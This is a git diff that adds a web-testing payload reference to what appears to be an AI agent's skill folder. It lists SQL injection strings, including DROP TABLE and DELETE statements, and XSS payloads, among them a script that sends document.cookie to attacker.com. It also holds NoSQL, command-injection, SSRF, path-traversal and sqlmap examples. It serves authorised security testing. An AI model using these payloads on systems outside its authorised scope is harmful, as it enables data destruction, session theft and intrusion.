init

2026-04-12 01:06:31 +07:00
commit 10d660cbcb
1066 changed files with 228596 additions and 0 deletions
--- a/.opencode/skills/web-testing/references/vulnerability-payloads.md
+++ b/.opencode/skills/web-testing/references/vulnerability-payloads.md
@@ -0,0 +1,93 @@
+# Vulnerability Test Payloads
+
+## SQL Injection
+
+### Text Input
+```
+' OR '1'='1
+' OR 1=1 --
+'; DROP TABLE users; --
+' UNION SELECT NULL, NULL --
+```
+
+### Numeric Input
+```
+1 OR 1=1
+1; DELETE FROM users; --
+```
+
+### Blind (Time-based)
+```
+' OR SLEEP(5) --
+' AND (SELECT(SLEEP(5)))a --
+```
+
+## XSS (Cross-Site Scripting)
+
+### Reflected
+```html
+<script>alert('XSS')</script>
+<img src=x onerror=alert('XSS')>
+<svg/onload=alert('XSS')>
+"><script>alert('XSS')</script>
+```
+
+### DOM-based
+```
+javascript:alert('XSS')
+<iframe src="javascript:alert('XSS')"></iframe>
+```
+
+### Cookie Theft
+```html
+<script>fetch('http://attacker.com/?c='+document.cookie)</script>
+```
+
+## NoSQL Injection (MongoDB)
+
+```json
+{"$ne": null}
+{"$gt": ""}
+{"$regex": ".*"}
+{"$where": "1==1"}
+```
+
+## Command Injection
+
+```
+; ls -la
+| whoami
+`whoami`
+$(whoami)
+```
+
+## SSRF
+
+```
+http://localhost/admin
+http://127.0.0.1/admin
+http://169.254.169.254/  # AWS metadata
+```
+
+## Path Traversal
+
+```
+../../../etc/passwd
+..%2F..%2F..%2Fetc%2Fpasswd
+```
+
+## CSRF Testing
+
+1. Submit form without CSRF token
+2. Reuse captured token multiple times
+3. Modify/remove token parameter
+
+## Testing Tools
+
+```bash
+# SQLMap
+sqlmap -u "http://example.com/page?id=1" --dbs
+
+# OWASP ZAP active scan
+zap-cli active-scan http://example.com
+```